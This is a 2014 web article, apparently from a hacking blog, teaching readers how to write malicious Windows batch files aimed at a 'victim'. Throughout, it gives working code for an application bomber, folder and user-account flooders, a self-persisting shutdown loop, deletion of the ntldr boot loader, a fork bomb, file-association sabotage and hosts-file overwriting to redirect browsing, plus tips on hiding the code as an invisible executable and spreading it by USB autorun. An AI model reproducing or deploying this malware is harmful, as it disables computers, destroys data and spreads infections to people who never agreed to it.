The Art Of Creating Batch Viruses Welcome to The Art Of Batch Viruses Creation and today i will be your Creator Welcome and Enjoy Creating Viruses by Using Batch. Hello Guys and today am going to share with you some of my art which is crating batch viruses. Batch files are type of executable files with the extention .bat . Coming to the point , we can create malicious and irritating virus just by typing their codes and saving them as .bat extension. What are Batch Files ? Batch files are files that have been saved with the extension of .bat and remember not all batch files are viruses but also all batch viruses are batch files. And let you have some fun on how batch programming can do Now open cmd by hitting windows button and R And write cmd and cmd will popup quietly And type as follows:- 1. md a //makes directory a on desktop 2. cd a // changes current directory to a 3. md b // makes a directory b in directory b We first make a folder/directory a, then enter in folder a,then make a folder b in folder a . Now delete the folder a. Lets do the same thing in an other way. Type the same three commands given above in the notepad and save the file as anything.bat . You can give any name in place of anything. likes pump.bat Now simply double click on this batch file and the same job will be done by the file created using notepad and by using command prompt(cmd) . You will get a folder with name a on your desktop and another folder with name b in it. This means the three commands are executed in order, when we ran the batch file So a batch file is nothing but a text containing series of commands which are executed automatically line by line when the batch file is run. that just it as other programming languages i hope if you are the programmer you may understand well What can batch viruses do ? They can be used to delete the windows files,format data,steal information ,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes. Remember as other programming languages can be used to create good and evil also batch programming can be used to create good and evil so it can help you or it can destroy you buddy!!! Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (here anything means any name youwant to give to your file but extension must be .bat and save it as all files instead of text files). Note: Type help in command prompt to know about some basic commands and to know about using a particular command , type command_name /? without quotes. Now Lets move on the topic---------------->>> 1. Application Bomber @echo off // It instructs to hide the commands when batch files is executed :x //loop variable start winword start mspaint //open paint start notepad start write start cmd //open command prompt start explorer start control start calc // open calculator goto x // infinite loop This code when executed will start opening different applications present in the system like paint,notepad,command prompt repeatedly(because of infinite loop), irritating the victim and of course affecting the performance. 2. Folder flooder @echo off :x md %random% // makes directory or folder. goto x Here %random% is a variable that would generate any positive number randomly. So this code will start creating folders whose name can be any random number. 3.User account flooder @echo off :x net user %random% /add //create user account goto x This code will start creating windows user accounts whose names could be any random numbers. 3.Shutdown Virus copy anything.bat “C:\Documents and Settings\Administrator\Start Menu \Programs\Startup” copy anything.bat “C:\Documents and Settings\All Users\Start Menu \Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP) shutdown -s -t 00 //this will shutdown the computer in 0 seconds Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft \Windows\Start Menu\Programs\Startup Everytime when the victim starts the computer, this batch file in start up will run and shutdown the computer immediately. You will be able to remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder. 4. Deleting boot files Goto C drive in Win XP , Tools->Folder Option->View Now Uncheck the option Hide operating system files and check option Show hidden files and folders. Click apply Now you can see the operating system files. There is a one file ntldr which is boot loader used to boot the windows. Lets make a batch file to delete this file from victims computer and the windows will not start then. attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively del ntldr //delete ntldr file After running this batch file , system will not reboot and a normal victim should definitely install the windows again use his computer. 5. Fork Bomb %0|%0 //Its percentage zero pipe percentage zero This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows . 6. Extension Changer @echo off assoc .txt=anything // command associates extension .txt with filetype anything. assoc .exe=anything assoc .jpeg=anything assoc .png=anything assoc .mpeg=anything Every extension is associated with a filetype like extension ‘.exe’. It is associated with filetype ‘exe file’. To know these, just type ‘assoc’ in command prompt. Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files will not be able to open properly. 7. DNS Poisoning There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file. The code is: @echo off echo xxx.xxx.xxx.xxx anything > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. anything in hosts file. Replace xxx.xxx.xxx.xxx and anything with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address. Note : Most of the batch viruses are simply undetectable by any anitiviruses Tip : Coding good viruses just depends on the DOS commands you know and logic you use. Remember 1.Victim can easily read the commands by opening batch file in notepad. Then you limit that download batch to exe converter given the below link Download Here After running converter , open the batch file virus , Save as exe file , set visibility mode Invisible application , than just click on compile button. You can use other options as per your requirement. Spreading batch viruses through pen drive -: Step 1: Open notepad and write [autorun] open=anything.bat Icon=anything.ico Save file as ‘autorun.inf’ Step 2: Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive . When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute. Thank you for visiting and continue browsing other articles.
Posted on: Wed, 05 Mar 2014 08:34:51 +0000
Trending Topics
Recently Viewed Topics
© 2015